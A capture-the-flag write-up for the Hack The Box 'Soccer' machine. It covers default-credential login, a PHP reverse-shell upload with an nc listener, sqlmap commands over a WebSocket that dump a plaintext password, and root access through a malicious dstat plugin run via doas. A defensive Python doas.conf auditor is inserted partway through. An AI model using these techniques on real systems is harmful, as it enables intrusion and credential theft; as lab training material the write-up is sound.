Soccer

User flag

Initial nmap:

$ nmap -sC -sV 10.10.11.194
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-11 12:30 CST
Nmap scan report for soccer.htb (10.10.11.194)
Host is up (0.13s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
|   256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
|_  256 5797565def793c2fcbdb35fff17c615c (ED25519)
80/tcp   open  http            nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Soccer - Index 
9091/tcp open  xmltec-xmlmail?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|   GetRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 139
|     Date: Sat, 11 Mar 2023 18:35:16 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot GET /</pre>
|     </body>
|     </html>
|   HTTPOptions, RTSPRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 143
|     Date: Sat, 11 Mar 2023 18:35:17 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot OPTIONS /</pre>
|     </body>
|_    </html>

This box is running Tiny File Manager 2.4.3 on http://soccer.htb/tiny, a version that has an authenticated file upload vulnerability.

The default credentials (admin/admin@123) worked to log in.

Using the Tiny File Manager portal, I was able to upload a PHP reverse shell into the "uploads" folder.

Start a netcat listener with:

nc -lvnp <port>

Then access the page at https://soccer.htb/tiny/uploads/revshell.php

Looking in /etc/nginx/sites-available shows that there's another site we can access. Add soc-player.soccer.htb to your /etc/hosts.

Go to the website and create an account. On the page shown after logging in, try a simple SQL injection, which works.

Inspecting the page source shows that this input is sent over a WebSocket to the service running on port 9091.

We can use the proxy from https://github.com/BKreisel/sqlmap-websocket-proxy to run sqlmap over the WebSocket and see what we can find.

sqlmap-websocket-proxy -u ws://soc-player.soccer.htb:9091 -p '{"id": "%param%"}' --json
sqlmap -u http://localhost:8080/?id=1 -p "id" --dbs
sqlmap -u http://localhost:8080/?id=1 -p "id" -D soccer_db --tables
sqlmap -u http://localhost:8080/?id=1 -p "id" -D soccer_db -T accounts --dump

This gives us a username and password in plaintext:

Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id   | email             | password             | username |
+------+-------------------+----------------------+----------+
| 1324 | player@player.htb | PlayerOftheMatch2022 | player   |
+------+-------------------+----------------------+----------+

We can then use these credentials to log in with ssh and get the user flag!

Root flag

First check for sudo permissions. Unfortunately, this user has none.

Then check for suid files:

player@soccer:~$ find /* -user root -perm -4000 -print 2>/dev/null | grep -v snap
/usr/local/bin/doas
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh

There's one thing that stands out here, and that's the locally installed doas. Check the configuration:

player@soccer:~$ cat /usr/local/etc/doas.conf 
permit nopass player as root cmd /usr/bin/dstat

If we look through the man page for dstat, we see that it can load plugins. The default plugins are stored in /usr/share/dstat, so take a look there to get an idea of what they do. They're just Python scripts, so it's pretty simple to abuse them for superuser access.
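As a defender's check on this kind of misconfiguration (an added example, not part of the writeup or of the doas or dstat projects), the following Python parses doas.conf rules and flags the ones that are looser than they look: nopass, no cmd, no args (so any dstat option can be passed), or a cmd whose plugin directory the permitted user can write. The dstat plugin paths are the ones from this box; the PLUGIN_DIRS table and the injected writable() callback are assumptions of the example.

```python
OPTIONS = {"nopass", "nolog", "persist", "keepenv"}
# Programs that load code from a directory at run time: "cmd <prog>" is only a
# restriction if none of those directories are writable. dstat's paths are the
# ones on this box; the table itself is a constructed example to extend locally.
PLUGIN_DIRS = {"/usr/bin/dstat": ["/usr/share/dstat", "/usr/local/share/dstat"]}


def parse_rule(line):
    """Parse 'permit|deny [options] identity [as target] [cmd prog [args ...]]'
    into a dict; returns None for blank or comment lines."""
    tokens = line.split("#", 1)[0].split()
    if not tokens:
        return None
    rule = {"action": tokens[0], "options": set(), "identity": None,
            "target": None, "cmd": None, "args": None}
    i = 1
    while i < len(tokens) and (tokens[i] in OPTIONS or tokens[i] == "setenv"):
        j = i  # setenv { VAR=value ... } spans several tokens, up to the "}"
        if tokens[i] == "setenv":
            j = next(k for k in range(i, len(tokens)) if tokens[k].endswith("}"))
        rule["options"].add(" ".join(tokens[i:j + 1]))
        i = j + 1
    if i >= len(tokens):
        raise ValueError("rule has no identity: " + line)
    rule["identity"], i = tokens[i], i + 1
    if i < len(tokens) and tokens[i] == "as":
        rule["target"], i = tokens[i + 1], i + 2
    if i < len(tokens) and tokens[i] == "cmd":
        rule["cmd"], i = tokens[i + 1], i + 2
        if i < len(tokens) and tokens[i] == "args":
            rule["args"] = tokens[i + 1:]  # a bare "args" means: no arguments
    return rule


def audit_rule(rule, writable):
    """Findings for one parsed rule. writable(path) -> bool says whether the
    rule's identity can write to path (injected: real os.stat check or a stub)."""
    findings = []
    if rule is None or rule["action"] != "permit":
        return findings
    target = rule["target"] or "any user"  # without "as", every target is allowed
    if "nopass" in rule["options"]:
        findings.append("nopass: no password needed to run as " + target)
    if rule["cmd"] is None:
        findings.append("no cmd: any command may be run as " + target)
    elif rule["args"] is None:
        findings.append("no args: caller chooses every argument to " + rule["cmd"])
    for d in PLUGIN_DIRS.get(rule["cmd"], []):
        if writable(d):
            findings.append("%s loads plugins from %s, writable by %s" % (rule["cmd"], d, rule["identity"]))
    return findings
```

Run over the box's single rule with a writable() that reports /usr/local/share/dstat as writable by player, it returns three findings: nopass, no args, and the writable plugin directory.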

Create a new plugin in /usr/local/share/dstat called dstat_flag.py and add the following:

# Runs as root when dstat, started through doas, loads this plugin.
import os
os.system("cat /root/root.txt")

Then run it with:

player@soccer:/usr/local/share/dstat$ doas /usr/bin/dstat --flag

And that's the root flag!